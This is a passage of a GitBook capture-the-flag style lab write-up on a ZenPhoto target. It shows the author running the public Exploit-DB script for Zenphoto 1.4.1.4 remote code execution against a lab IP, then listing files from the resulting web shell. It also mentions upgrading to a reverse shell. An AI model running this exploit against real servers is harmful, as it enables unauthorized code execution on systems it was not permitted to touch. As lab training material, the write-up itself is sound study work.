🐧
ZenPhoto
  • ZenPhoto
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • WhatWeb
    • 23 - Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
    • Other Services
      • SSH
      • SMTP
  • Exploitation
  • Priv Escalation
Powered by GitBook
On this page

Exploitation

PreviousSMTPNextPriv Escalation

Last updated 2 years ago

╭─      /home/kali/ZenPhoto ▓▒░────────────────────────────────────────────░▒▓ INT ✘  10m 48s    root@kali 
╰─ php /usr/share/exploitdb/exploits/php/webapps/18083.php 192.168.135.41 /test/

+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+

zenphoto-shell# ls
class.auth.php
class.file.php
class.history.php
class.image.php
class.manager.php
class.pagination.php
class.search.php
class.session.php
class.sessionaction.php
class.upload.php
config.base.php
config.php
config.tinymce.php
data.php
function.base.php

zenphoto-shell# ls /tmp

The exploit had a pretty annoying shell so I had to upgrade it using a my own shell.sh and changing its permissions and then catch a reverse shell in another listener.

ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code ExecutionExploit Database
Logo